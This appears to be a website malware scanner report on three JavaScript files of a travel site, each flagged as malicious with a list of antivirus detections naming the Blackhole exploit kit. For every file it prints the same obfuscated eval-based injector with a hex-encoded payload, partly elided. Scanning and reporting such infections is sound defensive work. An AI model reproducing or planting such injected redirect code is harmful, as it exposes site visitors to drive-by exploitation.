... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.DQ.1
- Avast
- JS:Decode-BKS [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall
- TROJ_GEN.F47V0829
- Comodo
- Exploit.JS.Blacole.EH
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- Exploit.BlackHole.197
- Kaspersky
- Trojan.JS.Redirector.zu
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BH
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BH
- AVG
- JS/Exploit
- Norman
- Blacole.VZ
- GData
- JS:Exploit.BlackHole.BH
- Commtouch
- Trojan.ZHEK-0
- BitDefender
- JS:Exploit.BlackHole.BH
|